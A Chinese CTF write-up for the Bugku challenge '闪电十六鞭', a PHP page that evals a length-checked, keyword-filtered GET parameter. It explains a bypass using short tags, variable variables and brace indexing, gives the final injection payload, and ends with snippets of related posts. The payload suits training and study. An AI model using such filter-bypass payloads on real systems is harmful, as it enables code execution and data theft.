Bugku 闪电十六鞭

进入环境，是一串php代码

<?phperror_reporting(0);require __DIR__.'/flag.php';$exam = 'return\''.sha1(time()).'\';';if (!isset($_GET['flag'])) {echo '<a href="./?flag='.$exam.'">Click here</a>';}else if (strlen($_GET['flag']) != strlen($exam)) {echo '长度不允许';}else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {echo '关键字不允许';}else if (eval($_GET['flag']) === sha1($flag)) {echo $flag;}else {echo '马老师发生甚么事了';}echo '<hr>';highlight_file(__FILE__);

分析：

1.变量flag的长度要和变量exam的长度一致，是49

2.过滤了flag,[]等一些关键字

3.eval函数:把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码，且必须以分号结尾。如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。

sha1可以利用短标签来绕过，<?php ?>是长标签,<? ?>是短标签，并且<?= ?>和<?php echo ?>是一样的意思

所以总的思路就是:用短标签和大括号，$$a绕过sha1和过滤的flag，[]，用eval函数输出flag，并且用11111......使长度等于49,要注意用;?>闭合开头的<?php

最后的payload:

?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111

Bugku 闪电十六鞭相关推荐

BugKu——闪电十六鞭
打开题目链接是一段php代码,应该是代码审计问题,首先分析源码目标是输出flag变量,所以flag就在flag变量里面输出条件有三个 flag变量长度等于$exam的长度,长度为49 flag变 ...
二十八、bugku 闪电十六鞭
php字符对照 &quot=" <?phperror_reporting(0);require __DIR__.'/flag.php';$exam = 'return\''.s ...
[bugku]-闪电十六鞭
==============================简化源码==============================1.strlen($_GET['flag']) != strlen($e ...
bugku ctf 闪电十六鞭＜?= ?＞短标签
0x00 解题须知在php中 <? ?>和<?= ?>是短标签而<?php ?>是长标签其中<?= 是代替 <? echo的 <? ?> ...
BugKu_闪电十六鞭
访问目标地址发现了一段php代码,又是代码审计的问题分析代码 <?phperror_reporting(0);require __DIR__.'/flag.php';$exam = 'ret ...
bugku-闪电十六鞭
1: 打开环境看看,bp备好的然后我就抓了, 没有任何意义于是点击网站上的Click here,,,马老师 2:审计PHP代码, 如果没有用get传参传入flag,则会显示Click here(正常 ...
第三百三十六章斗宗强者间的大战！
第三百三十六章斗宗强者间的大战! <script language="javascript" src="/js/style2.js"></s ...
第十六届全国大学智能车竞赛华东赛区成绩汇总
简介: 第十六届全国大学生智能车竞赛在上海理工大学举行.各组别成绩和奖项在本文中列出. 关键词: 智能车竞赛,华东赛区 §01 各组成绩一.基础四轮组学校名称队伍名称成绩决赛成绩获奖情况 ...
南京大学计算机曹云浩,【2015.青春曲园】第二十六届“迎校庆”校园十佳歌手大赛独家放送~...
原标题:[2015.青春曲园]第二十六届"迎校庆"校园十佳歌手大赛独家放送~ 林籁泉韵声动梁尘如歌似梦落凡尘如诗似画挂心头曲阜师范大学第二十六届"迎校庆" ...

Bugku 闪电十六鞭

Bugku 闪电十六鞭相关推荐

最新文章

热门文章